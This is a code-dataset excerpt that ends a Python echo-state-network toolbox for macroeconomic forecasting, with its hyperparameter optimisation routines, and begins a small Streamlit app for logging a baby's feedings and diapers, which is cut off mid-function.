== 'rls':\n V0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Ys[0:min_train_size,], X=Xs[0:min_train_size,], Lambda=0)\n Ys_fit_0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,])) @ W0\n W_, Ys_fit_rls = Wfun(Ys[min_train_size:,], Xs[min_train_size:,], W0=W0, P0=P0)\n #Ys_fit = np.vstack((Ys_fit_0, Ys_fit_rls))\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.vstack((Ys_fit_0, Ys_fit_rls)))\n Obj += np.sum(Res ** 2) / Xs.shape[0]\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.vstack((Ys_fit_0, Ys_fit_rls)) + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n else:\n raise ValueError(\"Unknown method option\")\n\n return Obj\n\n #print(HYPER_obj(0.1 * np.ones(3 * mN)))\n\n #print(HYPER_obj(np.array((2.806210327148437,2.55,1.016578674316406,4.000015258789063,2.899169921875000e-04,0))))\n\n #assert 0 == 1\n \n if method in ('ridge'):\n problem = FunctionalProblem((3 * mN),\n HYPER_obj,\n x0 = np.hstack((0.5 * np.ones(mN), np.ones(mN), 0.01* np.ones(mN))), #[0.5, 1e-8],\n xl = np.hstack((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))), #[1.001, 1e8]\n )\n elif method in ('least_squares', 'rls'):\n # NOTE: when the method does not allow for ridge penalty \n # just create a degenerate parameter space for 'lambda'\n problem = FunctionalProblem((3 * mN),\n HYPER_obj,\n x0 = np.hstack((0.5 * np.ones(mN), np.ones(mN), 0.01* np.ones(mN))), #[0.5, 1e-8],\n xl = np.hstack((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))), #[1.001, 1e8]\n )\n\n res_h = pymoo_minimize(\n problem, \n #PatternSearch(n=10),\n #PatternSearch(np.concatenate((0.8 * np.ones(mN), 1 * np.ones(mN), np.zeros(mN)))),\n PatternSearch(n_sample_points=250), \n #NSGA2(),\n #PSO(),\n #get_termination(\"n_eval\", 2000), \n get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=debug, \n seed=1203477\n )\n\n #res_h = dual_annealing(\n # HYPER_obj,\n # x0=np.concatenate((0.8 * np.ones(mN), np.ones(mN), 0.0 * np.ones(mN))),\n # bounds=tuple(zip(\n # np.concatenate((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n # np.concatenate((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))),\n # )),\n # #sampling_method='sobol',\n # #options={'disp': True},\n #)\n\n if debug: print(\". Packing result\")\n\n # Evaluate optimization fit\n rho_opt = (res_h.X)[0:mN]\n #lambda_opt = (res_h.X)[mN:]\n #lambda_opt = np.exp((res_h.X)[mN:(2*mN)]) - 1\n gamma_opt = (res_h.X)[(mN):(2*mN)]\n leak_rate_opt = (res_h.X)[(2*mN):]\n\n length_train = []\n W_ = []\n Y_fit = []\n Residuals = []\n\n if debug: \n if not pca is None:\n print(f\"PCA:\\nn_components = {pca.n_components_}\")\n print(\"Best solution found:\")\n print(f\"rho = {rho_opt}\")\n #print(f\"lambda = {lambda_opt}\")\n print(f\"gamma = {gamma_opt}\")\n print(f\"leak_rate = {leak_rate_opt}\")\n print(f\"Final objective funtion value:\")\n print(f\"F = {HYPER_obj(res_h.X)}\")\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt)\n\n # Slice matrices\n Y_o = Y_[1:,]\n X_o = X_[0:(-1),]\n if method in ('least_squares', 'ridge') and not tscv is None:\n for train_index, test_index in tscv.split(X_o):\n W_split = Wfun(Y_o[train_index,], X_o[train_index,])\n Y_fit_split = np.hstack((np.ones((len(test_index), 1)), X_o[test_index,])) @ W_split\n Residuals_split = (Y_o[test_index,] - Y_fit_split)\n length_train.append(len(train_index))\n W_.append(W_split)\n Y_fit.append(Y_fit_split)\n Residuals.append(Residuals_split)\n elif method == 'rls':\n length_train = [0, ] #[X_o.shape[0], ]\n V0 = np.hstack((np.ones((min_train_size, 1)), X_o[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Y_o[0:min_train_size,], X=X_o[0:min_train_size,], Lambda=0)\n Y_fit_0 = V0 @ W0\n W_, Y_fit_rls = Wfun(Y_o[min_train_size:,], X_o[min_train_size:,], W0=W0, P0=P0)\n W_ = [W_, ]\n Y_fit = [np.vstack((Y_fit_0, Y_fit_rls)), ]\n Residuals = [(Y_o - Y_fit[0]), ]\n else:\n length_train = [0, ] #[X_o.shape[0], ]\n W_ = [Wfun(Y_o, X_o), ]\n Y_fit = [np.hstack((np.ones((X_o.shape[0], 1)), X_o)) @ W_[0], ]\n Residuals = [(Y_o - Y_fit[0]), ]\n\n # Output\n res = {\n 'rho_opt': rho_opt,\n #'lambda_opt': lambda_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n elif mode_pars == 'componentRLGL':\n\n #def sparse_mask(n1, n2):\n # mask = np.array(tuple(zip(np.repeat(np.arange(n1), n1), np.tile(np.arange(n2), n2))))\n # np.random.shuffle(mask)\n # return mask\n\n spm_A = []\n spm_C = []\n for j in range(len(z) + int(self.ar_)):\n spm_Aj_ = np.arange(self.models_N_[j] ** 2)\n spm_Cj_ = np.arange(self.models_N_[j] * self.models_[j].C_.shape[1])\n np.random.shuffle(spm_Aj_)\n np.random.shuffle(spm_Cj_)\n spm_A.append(spm_Aj_)\n spm_C.append(spm_Cj_)\n\n def multiLambda(p_lambda):\n d = np.zeros(sum(self.models_N_))\n i = 0\n for n, k in enumerate(self.models_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n return np.diagflat(d)\n\n def HYPER_obj(parsRLGL):\n p_rho = parsRLGL[0:mN]\n p_gamma = parsRLGL[(mN):(2*mN)]\n p_leak_rate = parsRLGL[(2*mN):(3*mN)]\n\n p_multilambda = 10**parsRLGL[(3*mN):(4*mN)]\n #p_lambda = 10**parsRLGL[(3*mN)]\n\n p_sparse_A = parsRLGL[(4*mN):(5*mN)]\n p_sparse_C = parsRLGL[(5*mN):(6*mN)]\n\n Obj = 0\n\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), self.M_), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0\n for j, zj_ in enumerate(Z):\n Aj_ = np.ndarray.flatten(self.models_[j].A_)\n spm_Aj_ = spm_A[j][0:np.floor(self.models_N_[j] ** 2 * p_sparse_A[j]).astype(int)]\n Aj_[spm_Aj_] = 0\n Aj_ = np.reshape(Aj_, (self.models_N_[j], -1))\n\n Cj_ = np.ndarray.flatten(self.models_[j].C_)\n spm_Cj_ = spm_C[j][0:np.floor(self.models_N_[j] * self.models_[j].C_.shape[1] * p_sparse_C[j]).astype(int)]\n Cj_[spm_Cj_] = 0\n Cj_ = np.reshape(Cj_, (self.models_N_[j], -1))\n\n Xj_ = self.models_[j].generate_states(\n z=zj_, A=Aj_, C=Cj_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n #X_[:,p:(p+self.models_N_[j])] = Xj_[X_multi_idx[j],]\n #p += self.models_N_[j]\n Xj_ = Xj_[X_multi_idx[j],]\n\n nMin = 50 #self.models_N_[j]\n for h in range(nMin, Xj_.shape[0]-1):\n # #Wj_h = Wfun(Xj_[0:h,], yj_[0:h,], p_lambda[j])\n # #Resj_h = (yj_[h,] - np.hstack((1, Xj_[h,])) @ Wj_h)\n # #Obj += np.sum(Resj_h ** 2) \n # #\n Wj_h = ls_ridge(Y=Y_[1:(1+h),], X=Xj_[0:h,], Lambda=p_multilambda[j])\n #Resj_h = (Y_[(1+h),] - np.hstack((1, Xj_[h,])) @ Wj_h)\n Resj_h = (Y_[h:(2+h),] - np.hstack((np.ones((2, 1)), Xj_[(h-1):(h+1),])) @ Wj_h)\n Obj += np.sum(Resj_h ** 2)\n\n #Wj_ = jack_ridge(Y=Y_[1:,], X=Xj_[:-1,], Lambda=p_multilambda[j])\n #Wj_h = ls_ridge(Y=Y_[1:(1+h),], X=Xj_[0:h,], Lambda=p_multilambda[j])\n #Resj_ = (Y_[1:,] - np.hstack((np.ones((Xj_.shape[0]-1, 1)), Xj_[:-1,])) @ Wj_)\n #Obj += np.sum(Resj_ ** 2)\n\n #nMin = 50\n #for h in range(nMin, X_.shape[0]-1):\n # #p_Lambda_ = multiLambda(p_multilambda)\n # p_Lambda = p_lambda\n # W_h = ls_ridge(Y=Y_[1:(1+h),], X=X_[0:h,], Lambda=p_Lambda)\n # Res_h = (Y_[(1+h),] - np.hstack((1, X_[h,])) @ W_h)\n # Obj += np.sum(Res_h ** 2) \n\n #Obj += 1 * np.sum(1 / p_gamma)\n\n return Obj\n\n #print(HYPER_obj(np.hstack((0.95 * np.ones(mN), 1 * np.ones(mN), 0.1 * np.ones(mN), -4 * np.ones(mN),\n # 0.3 * np.ones(mN), 0.3 * np.ones(mN)))))\n\n problem = FunctionalProblem(\n (6 * mN),\n HYPER_obj,\n x0 = np.hstack((0.95 * np.ones(mN), 1 * np.ones(mN), 0.1 * np.ones(mN), -4 * np.ones(mN), 0.5 * np.ones(mN), 0.5 * np.ones(mN))), \n xl = np.hstack((0.01 * np.ones(mN), 0.01 * np.ones(mN), np.zeros(mN), -5 * np.ones(mN), 0 * np.ones(mN), 0 * np.ones(mN))),\n xu = np.hstack((3.00 * np.ones(mN), 3 * np.ones(mN), 0.99 * np.ones(mN), +5 * np.ones(mN), 1 * np.ones(mN), 1 * np.ones(mN))), \n )\n\n res_h = pymoo_minimize(\n problem, \n #PSO(),\n #PatternSearch(),\n #NelderMead(),\n PatternSearch(n_sample_points=250), \n get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=debug, \n seed=1203477\n )\n\n if debug:\n print(\"Best solution found: \\nX = %s\\nF = %s\" % (res_h.X, res_h.F))\n\n if debug: print(\". Packing result\")\n\n rho_opt = (res_h.X)[0:mN]\n gamma_opt = (res_h.X)[(mN):(2*mN)]\n leak_rate_opt = (res_h.X)[(2*mN):(3*mN)]\n lambda_opt = 10**(res_h.X)[(3*mN):(4*mN)]\n\n sparse_A_opt = (res_h.X)[(4*mN):(5*mN)]\n sparse_C_opt = (res_h.X)[(5*mN):(6*mN)]\n\n X_ = np.full((len(Y_dates), self.M_), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0\n A_ = []\n C_ = []\n for j, zj_ in enumerate(Z):\n Aj_ = np.ndarray.flatten(self.models_[j].A_)\n spm_Aj_ = spm_A[j][0:np.floor(self.models_N_[j] ** 2 * sparse_A_opt[j]).astype(int)]\n Aj_[spm_Aj_] = 0\n Aj_ = np.reshape(Aj_, (self.models_N_[j], -1))\n A_.append(Aj_)\n\n Cj_ = np.ndarray.flatten(self.models_[j].C_)\n spm_Cj_ = spm_C[j][0:np.floor(self.models_N_[j] * self.models_[j].C_.shape[1] * sparse_C_opt[j]).astype(int)]\n Cj_[spm_Cj_] = 0\n Cj_ = np.reshape(Cj_, (self.models_N_[j], -1))\n C_.append(Cj_)\n\n Xj_ = self.models_[j].generate_states(\n z=zj_, A=Aj_, C=Cj_, zeta=self.models_[j].zeta_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj_[X_multi_idx[j],]\n p += self.models_N_[j]\n\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n length_train = [Xs.shape[0], ]\n Lambda_opt = multiLambda(lambda_opt)\n #Lambda_opt = lambda_opt\n W_ = [ls_ridge(Y=Ys, X=Xs, Lambda=Lambda_opt), ]\n Y_fit = [np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_[0], ]\n Residuals = [(Ys - Y_fit[0]), ]\n\n # Output\n res = {\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'lambda_opt': lambda_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=A_[j], C=C_[j], activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n \n elif mode_pars == 'componentEKF':\n # Fallback parameters\n assert len(mode_opts) > 0, \"EKF linearization option required, -canonical or -joint\"\n linearization = mode_opts[0]\n\n cv_splits = 0\n test_size = None\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')-1])\n assert cv_splits >= 0\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')-1])\n assert test_size >= 0\n\n if debug: print(\". EKF optimization\")\n\n # Component-wise EKF hyperparameter optimization\n rho_opt = []\n gamma_opt = []\n leak_rate_opt = []\n\n # NOTE: this is a horrible hack!!!\n #K = [3, 24] if mN == 2 else [1 for _ in range(mN)]\n\n Z = (Y, ) + z if self.ar_ else z\n for j, zj_ in enumerate(Z):\n Ys_j = zj_.iloc[1:,].to_numpy()\n zs_j = zj_.iloc[0:(-1),].to_numpy() \n optim_j = self.models_[j].optim(\n Y=Ys_j, z=zs_j, \n mode='EKF-'+linearization,\n debug=debug,\n )\n rho_opt.append(optim_j['rho_opt'])\n gamma_opt.append(optim_j['gamma_opt'])\n leak_rate_opt.append(optim_j['leak_rate_opt'])\n\n rho_opt = np.array(rho_opt)\n gamma_opt = np.array(gamma_opt)\n leak_rate_opt = np.array(leak_rate_opt)\n \n # Generate optimized states\n def HYPER_states(p_rho, p_gamma, p_leak_rate):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0 #self.models_N_[0]\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n p += self.models_N_[j]\n # Lags\n q = p + self.models_N_[j]\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n return X_\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt)\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n\n # Regularizer optimization\n if debug: print(\". Multi-frequency optimization\")\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n def multiLambda(p_lambda):\n d = np.zeros(sum(self.models_N_))\n i = 0\n for n, k in enumerate(self.models_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n return np.diagflat(d)\n\n def HYPER_obj(parsRLGL):\n p_lambda = parsRLGL[0:mN]\n\n W_ = ls_ridge(Y=Ys, X=Xs, Lambda=multiLambda(p_lambda))\n\n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Ys[train_index,], Xs[train_index])\n if loss == 'RSS':\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_ + 5, Ys[test_index,] + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n else:\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n Obj += np.sum(Res ** 2)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_ + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n\n return Obj\n\n problem = FunctionalProblem((mN),\n HYPER_obj,\n x0 = 1e-3 * np.ones(mN),\n xl = 1e-6 * np.ones(mN),\n xu = 1e3 * np.ones(mN),\n )\n\n res_h = pymoo_minimize(\n problem, \n PatternSearch(),\n #PatternSearch(n_sample_points=250), \n #NSGA2(),\n #PSO(),\n get_termination(\"n_eval\", 2000), \n #get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:30\"),\n verbose=True, \n seed=1203477\n )\n\n lambda_opt = res_h.X\n\n if debug: print(\". Packing result\")\n\n print(res_h)\n\n length_train = [Xs.shape[0], ]\n W_ = [ls_ridge(Y=Ys, X=Xs, Lambda=multiLambda(lambda_opt)), ]\n Y_fit = [np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_[0], ]\n Residuals = [(Ys - Y_fit[0]), ]\n\n # Output\n res = {\n 'lambda_opt': lambda_opt,\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n elif mode_pars == 'E_psi':\n # Fallback parameters\n cv_splits = 0\n test_size = None\n min_train_size = 1\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')])\n assert cv_splits >= 0\n if method == 'rls': \n print(\"[Fit method is RLS, ignoring CV options]\")\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')])\n assert test_size >= 0\n if 'min_train_size' in mode_opts:\n min_train_size = int(mode_nums[mode_opts.index('min_train_size')])\n assert min_train_size >= 0\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n\n def HYPER_states(p_rho, p_gamma, p_leak_rate, p_zeta):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0 \n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=p_zeta[j],\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n # Lags\n q = p + self.models_N_[j]\n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n return X_\n\n def HYPER_obj(parsRLGL):\n p_psi = parsRLGL[0:mN]\n p_leak_rate = parsRLGL[(mN):(2*mN)]\n # Effective form\n p_rho = []\n p_gamma = []\n p_zeta = []\n for j in range(len(self.models_)):\n p_rho.append((p_psi[j] * self.models_[j].rho_ / self.models_[j].gamma_))\n p_gamma.append(p_psi[j])\n p_zeta.append((p_psi[j] * self.models_[j].zeta_ / self.models_[j].gamma_))\n\n X_ = HYPER_states(p_rho, p_gamma, p_leak_rate, p_zeta)\n\n # Slice matrices\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n\n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Y=Ys[train_index,], X=Xs[train_index])\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n else:\n #W_ = Wfun(Ys, Xs)\n # RSS\n #Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n #Obj += np.sum(Res ** 2)\n nMin = 30\n for h in range(nMin, Xs.shape[0]):\n W_h = Wfun(Y=Ys[0:h,], X=Xs[0:h,])\n Res_h = (Ys[h,] - np.hstack((1, Xs[h,])) @ W_h)\n Obj += np.sum(Res_h ** 2) \n\n return Obj\n\n HYPER_obj(np.hstack((np.ones(mN), np.zeros(mN))))\n\n problem = FunctionalProblem((2 * mN),\n HYPER_obj,\n x0 = np.hstack((np.ones(mN), np.zeros(mN))), \n xl = np.hstack((1e-2 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), np.ones(mN))), \n )\n\n res_h = pymoo_minimize(\n problem, \n PatternSearch(), \n #PatternSearch(n_sample_points=250),\n #NSGA2(),\n #PSO(),\n get_termination(\"n_eval\", 150), \n #get_termination(\"time\", \"00:03:00\"),\n verbose=debug, \n seed=1203477\n )\n\n if debug: print(\". Packing result\")\n\n # Evaluate optimization fit\n psi_opt = (res_h.X)[0:mN]\n leak_rate_opt = (res_h.X)[(mN):(2*mN)]\n\n rho_opt = np.zeros(mN)\n gamma_opt = np.zeros(mN)\n zeta_opt = []\n for j in range(len(self.models_)):\n rho_opt[j] = (psi_opt[j] * self.models_[j].rho_ / self.models_[j].gamma_)\n gamma_opt[j] = (psi_opt[j])\n zeta_opt.append((psi_opt[j] * self.models_[j].zeta_ / self.models_[j].gamma_))\n\n length_train = []\n W_ = []\n Y_fit = []\n Residuals = []\n\n if debug: \n print(\"Best solution found:\")\n print(f\"psi = {psi_opt}\")\n print(f\"leak_rate = {leak_rate_opt}\")\n print(f\"Final objective funtion value:\")\n print(f\"F = {HYPER_obj(res_h.X)}\")\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt, zeta_opt)\n\n # Slice matrices\n Y_o = Y_[1:,]\n X_o = X_[0:(-1),]\n if method in ('least_squares', 'ridge') and not tscv is None:\n for train_index, test_index in tscv.split(X_o):\n W_split = Wfun(Y_o[train_index,], X_o[train_index,])\n Y_fit_split = np.hstack((np.ones((len(test_index), 1)), X_o[test_index,])) @ W_split\n Residuals_split = (Y_o[test_index,] - Y_fit_split)\n length_train.append(len(train_index))\n W_.append(W_split)\n Y_fit.append(Y_fit_split)\n Residuals.append(Residuals_split)\n else:\n length_train = [0, ] #[X_o.shape[0], ]\n W_ = [Wfun(Y_o, X_o), ]\n Y_fit = [np.hstack((np.ones((X_o.shape[0], 1)), X_o)) @ W_[0], ]\n Residuals = [(Y_o - Y_fit[0]), ]\n\n # Output\n res = {\n 'psi_opt': psi_opt,\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'zeta_opt': zeta_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, zeta=zeta_opt[j], activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n else:\n raise ValueError(\"Optimization method descriptor not defined\")\n\n res['mode'] = mode\n res['mode_pars'] = mode_pars\n res['mode_opts'] = mode_opts\n res['mode_nums'] = mode_nums\n\n if optimized_ESN:\n return res, esnmulti_opt\n else:\n return res\n","repo_name":"RCEconModelling/Reservoir-Computing-for-Macroeconomic-Modelling","sub_path":"python/newToolbox_ESN_Multi.py","file_name":"newToolbox_ESN_Multi.py","file_ext":"py","file_size_in_byte":131967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12485267926","text":"import streamlit as st\nimport os\nimport numpy as np\nimport pandas as pd\nimport altair as alt\nimport datetime\n\n\n\n\ndef get_inputs():\n st.header(\"Inputs\")\n data={}\n today=datetime.datetime.utcnow()-datetime.timedelta(hours=4)\n today_date=today.date()\n today_time=today.time()\n d = st.date_input(\"Date\",today_date)\n data['Date']=d\n\t#st.write('Date:', d)\n t=st.time_input('Time', today_time)\n\t#st.write('Time', t)\n data['Time']=t\n\n Foptions=['','Breast (Fed)', 'Breast (Pumped)', 'Formula (Similac)', 'Formula (Neopro)', 'Formula (Neopro Gentlease)']\n Food = st.selectbox('Food',Foptions)\n data['Food']=Food\n Quantity=st.number_input('Quantity (ml)', value=0, step=5)\n data['Quantity (ml)']=Quantity\n\n st.write(\"Diaper Inputs\")\n pee = st.checkbox('pee')\n poo = st.checkbox('poo')\n if pee ==1:\n data['Pee']='Pee'\n else:\n data['Pee']=''\n if poo ==1:\n data['Poop']='Poop'\n else:\n data['Poop']=''\n notes= st.text_input(\"Notes\", value = '')\n data['Notes'] =notes\n# cs=df1.columns.to_list()\n# st.write(cs)\n data_df=pd.DataFrame([data])\n data_df=data_df.replace('Empty', ' ')\n# st.write(data_df)\n data_df=data_df[['Date', 'Time', 'Pee', 'Poop', 'Food', 'Quantity (ml)', 'Notes']]\n# save=st.selectbox(\"End\",['save or test?','save','test'])\n# if save=='save':\n# data_df.to_csv(\"temp.csv\")\n# st.write(\"Saved\")\n# st.write(df1.iloc[-1])\n# elif save=='test':\n# data_df.to_csv(\"temp.csv\")\n# st.write(\"Written to temp\")\n# save= st.selectbox('Delete will not include above input, Temp gives one shot, Save adds input to file',['Delete','Save','Temp'])\n save=st.button(\"Save\")\n if save ==True:\n data_df.to_csv(\"temp.csv\")\n st.write(\"Saved\")\n# df2=get_fulldata()\n# df2.to_csv(\"Marie_Tracker_Responses1.csv\")\n# elif save=='Delete':\n# os.remove(\"temp.csv\")\n# elif save=='Temp':\n# pass\n return \n\ndef get_data0():\n df1=pd.read_csv(\"Marie_Tracker_Responses1.csv\")\n df1=df1[['Date','Time', 'Pee', 'Poop', 'Food', 'Quantity (ml)', 'Notes']]\n #df1['Date']=pd.to_datetime(df1['Date'], format='%d/%m/%Y')\n df1['Date']=pd.to_datetime(df1['Date'])\n df1['Date']=df1['Date'].dt.date\n df1=df1.replace(np.nan, '', regex=True)\n df1.loc[df1['Notes'].str.contains('Gentlease'),'Food']='Formula (Neopro Gentlease)'\n return df1\n\ndef get_fulldata():\n df1=get_data0()\n if os.path.isfile(\"temp.csv\"):\n temp=pd.read_csv(\"temp.csv\",index_col=0)\n temp['Date']=pd.to_datetime(temp['Date'])\n temp['Date']=temp['Date'].dt.date\n df1=df1.append(temp,ignore_index=True)\n df1.to_csv(\"Marie_Tracker_Responses1.csv\")\n os.remove(\"temp.csv\")\n return df1\n\nst.title (\"Marie Tracker\")\n\ndef main():\n df1=get_fulldata()\n df1r=df1[::-1]\n df1f=df1r[df1r['Food']!='']\n df1f=df1f.iloc[0]\n st.header(\"Home\")\n st.write(\"Last feeding\", df1f['Date'], df1f['Time'], df1f['Food'], df1f['Quantity (ml)'],\"ml\")\n\n st.subheader(\"Last 3 days\")\n date_uni=df1r['Date'].unique()\n days3=date_uni[1:4] \n\n df1_1=df1[df1['Date']==days3[0]]\n df1_2=df1[df1['Date']==days3[1]]\n 